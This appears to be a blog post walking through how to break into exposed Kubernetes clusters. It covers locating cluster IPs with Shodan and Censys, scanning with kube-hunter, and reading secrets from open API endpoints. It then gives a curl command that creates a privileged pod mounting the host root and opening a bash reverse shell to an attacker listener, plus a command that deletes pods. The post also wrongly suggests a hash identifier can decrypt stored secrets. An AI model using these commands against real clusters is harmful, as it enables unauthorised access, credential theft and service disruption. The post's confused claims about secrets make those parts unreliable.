Ways to get into the Kubernetes cluster —Part 1

Manoj Deshmukh
4 min readNov 18, 2023

--

Overview:

This article gives you an extensive view of how to gain access to the Kubernetes cluster.

Inroduction

One effective way to grasp the importance of Kubernetes security is by exploring a vulnerable API endpoint scenario. An API endpoint serves as a gateway for communication between different components of a system. When insecurely configured or exploited, it can become a potential entry point for attackers.

How do I identify a Kubernetes Clusters IP?

You found an IP address, and now you need to verify that it is Kubernetes Clusters IP.

Use shodan.io or search.censys.io to verify.

Shodan results
censys results

Have you found the Kubernetes Cluser IP?

Yes.

Now we need to find the open ports like 80, 443, 8080, 8001, 6443, 8009.

Open all ports and check if any port has a vulnerable API endpoint.

It should look like this.

Kubernetes API server with full access

Kube-hunter

Use Kuber-hunter to scan the vulnerabilities in the Kubernetes cluster.

https://github.com/aquasecurity/kube-hunter

kube-hunter scan on kubernetes cluster

If the UI dashboard is open now, you can view all the namespaces and pods running, create and delete pods, exec to pods, and see the secret data in pods. It will give you the RABC roles and more.

Now What?

Now you have full access to read the cluster services like namespaces, pods, secerts, services, tokens, login credentials for databases, and many more.

You can use the Fuzz List to access the data.

First, find the UI end point and check whether it is open.

<ip>:8001/api/v1/namespaces/kubernetes-dashboard/services/kubernetes-dashboard/proxy

Kubernetes Web UI

What if the UI is not available?

Now first, go to secrets and find the token: http://<ip>:8080/api/v1/secrets

Secret token in kuernetes

Grab the secret and store it.

Now check out all the secrets here. You may find a database, username, password, and hostname in encrypted form. Copy them, and use https://hashes.com/en/tools/hash_identifier to decrypt them.

Secret Credentials exposed in Kubernetes

Create a pod using this vulnerability.

First, we need to create a pod inside this cluster.

curl -k -X POST -H 'Content-Type: application/yaml' \
-H "Authorization: Bearer <JWT_TOKEN>" --data '
apiVersion: v1
kind: Pod
metadata:
name: alpine
spec:
containers:
- name: alpine
image: ubuntu
command: ['/bin/bash', '-c', 'sh -i >& /dev/tcp/<Reverse shell IP>/12345 0>&1']
volumeMounts:
- mountPath: /demo/
name: mount-demo-into-mnt
volumes:
- name: mount-demo-into-mnt
hostPath:
path: /
automountServiceAccountToken: true
hostNetwork: true' "https://<ip>/api/v1/namespaces/default/pods"

Use this curl command and add the IP address to receive a revershell, and add the cluster IP address at the bottom.

Open a netcat port in your machine using ncat -lp 12345

Now you can directly hit this using CLI or Postman.

Creating pod using vulnerble API

Now pod has been pushed to cluster and is waiting to get initialized.

You can verify the status of the pod at this end point.

https://<ip>:8080/api/v1/namespaces/default/pods

Pod got created

After pod starts, you can type the ls command in your terminal to check if reverse shell is enabled.

Established reverseshell

Hurry, You have successfully established a connection to pod.

Now you are all set to get inside the Kubernetes cluster.

How do I delete pods?

curl http://<ip>:8080/api/v1/namespaces/default/pods/nginx1 \  
-X DELETE -k \
-H "Authorization: Bearer <Token>"

If you add the same token and send it through CLI or Postman, the pod will be deleted. Here, change the pod name that you want to delete at the end.

/api/v1/namespaces/default/pods/<pod name>

Deleteing Pod

Verify that the pod was deleted.

Pod got deleted

Conclusion:

The vulnerability of Kubernetes API endpoints poses a significant risk to the overall security of containerized environments. As organizations increasingly adopt Kubernetes for container orchestration, it becomes imperative to address and mitigate potential weaknesses in API security. The exposure of vulnerable API endpoints can lead to a range of security threats, including unauthorized access, data breaches, and service disruptions.

You can find Part 2 here:

https://manojdeshmukh45.medium.com/ways-to-get-into-the-kubernetes-cluster-part-2-b08b72ee5875

--

--

Manoj Deshmukh
Manoj Deshmukh

Written by Manoj Deshmukh

4+ Years’ Experience in Cybersecurity, VAPT, Cloud and Kubernetes Security, Cyber Forensics. CySA+ & CEH Practicals

No responses yet